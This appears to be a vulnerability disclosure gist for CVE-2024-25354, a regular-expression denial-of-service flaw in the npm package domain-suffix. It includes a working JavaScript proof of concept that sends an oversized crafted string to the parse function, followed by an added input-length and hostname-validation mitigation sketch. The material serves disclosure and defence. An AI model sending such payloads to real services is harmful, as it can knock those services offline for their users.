@6en6ar
Last active March 20, 2024 07:41
Security issue in domain-suffix
Product: https://www.npmjs.com/package/domain-suffix
Version: 1.0.8
Vulnerability type: Denial of Service
CVE ID: CVE-2024-25354
The regex defined on line 28 of https://github.com/ikrong/domain-suffix/blob/master/src/domainSuffix.ts
is vulnerable to Regular Expression Denial of Service (ReDoS). When a long string is provided to the application
without specifying the "/" character, the parse function gets stuck for a long time, 10 seconds in this case,
and this can be amplified if more characters are added.
PoC code:
const DomainSuffix = require("domain-suffix").domainSuffix;

console.time('[ + ] Time passed -> ');
// The trailing backslash is escaped so that the string literal terminates.
var payload = "aA".repeat(95500) + '/Aa\\';
let result = DomainSuffix.parse("https://" + payload);
if (result) {
    let { suffix, domain } = result;
    console.log(suffix, domain);
} else {
    console.log("cannot parse");
}
console.timeEnd('[ + ] Time passed -> ');
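
Mitigation sketch (an added example, not part of the original gist or of the domain-suffix project): a guard that bounds and validates input before it reaches a regex-based parser such as the one above. The names guardedParse and extractHostname and the 2048-character URL cap are assumptions chosen for illustration; the parser is passed in as a function and is assumed to accept a "https://host" string, as in the PoC call.

```javascript
// Added example: keep attacker-sized strings away from a backtracking regex.
const MAX_URL_LENGTH = 2048;      // assumed application limit, tune as needed
const MAX_HOSTNAME_LENGTH = 253;  // longest DNS name in textual form
// One DNS label: 1-63 chars, no leading/trailing hyphen. The bounded
// quantifier keeps matching time proportional to the label length.
const LABEL = /^[a-z0-9_](?:[a-z0-9_-]{0,61}[a-z0-9_])?$/;

// Returns a lower-cased, length-checked hostname, or null when input is rejected.
function extractHostname(input) {
  if (typeof input !== "string") return null;
  // Cheap length check first: this is what stops a 191,000-character payload.
  if (input.length === 0 || input.length > MAX_URL_LENGTH) return null;
  let url;
  try {
    // The WHATWG URL parser is not regex based; add a scheme if none is given.
    url = new URL(input.includes("://") ? input : "http://" + input);
  } catch {
    return null;
  }
  const host = url.hostname.toLowerCase().replace(/\.$/, "");
  if (host.length === 0 || host.length > MAX_HOSTNAME_LENGTH) return null;
  return host.split(".").every((label) => LABEL.test(label)) ? host : null;
}

// parseFn is the library call being protected, for example
// (s) => DomainSuffix.parse(s). It only ever sees "https://" + hostname.
function guardedParse(input, parseFn) {
  const host = extractHostname(input);
  return host === null ? null : parseFn("https://" + host);
}

// Constructed demonstration with a stub in place of the real parser.
const seen = [];
const stubParser = (s) => { seen.push(s); return { parsed: s }; };
console.log(guardedParse("https://www.Example.com/a/b?c=1", stubParser));
console.log(guardedParse("https://" + "aA".repeat(95500) + "/Aa\\", stubParser));
console.log("strings that reached the parser:", seen);
```

The oversized string is rejected by the length check before any URL or regex processing, so the cost of refusing it does not grow with the payload size.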